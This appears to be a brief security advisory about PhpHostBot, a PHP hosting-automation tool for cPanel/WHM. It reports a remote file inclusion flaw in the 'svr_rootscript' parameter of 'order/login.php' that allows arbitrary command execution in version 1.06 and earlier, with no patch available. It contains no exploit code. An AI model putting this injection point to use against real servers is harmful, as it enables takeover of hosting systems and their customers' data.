A webware PHP application, PhpHostBot integrates with the Cpanel(WHM) web hosting control panel to automate web hosting client account creation and billing. It support Paypal subscriptions, free web hosting, sub-domain and reseller account setup. The web hosting automating features include automatic account creation & suspension (or complete termination) if your client cancels their hosting plan, fully automatic and instant client account creation (or optional account creation pending administrative approval), and account creation setup fail-safe, easy failure recovery and alerts.

Now a vulnerability has been identified in PhpHostBot that could be exploited by remote attackers to compromise a vulnerable web server. The issue is caused by an input validation error in the "order/login.php" script when processing the "svr_rootscript" parameter. It can be exploited by remote attackers to include malicious PHP scripts and execute arbitrary commands with the privileges of the web server. PhpHostBot version 1.06 and prior are affected by this vulnerability. However, no official patch has yet been supplied to close the vulerability.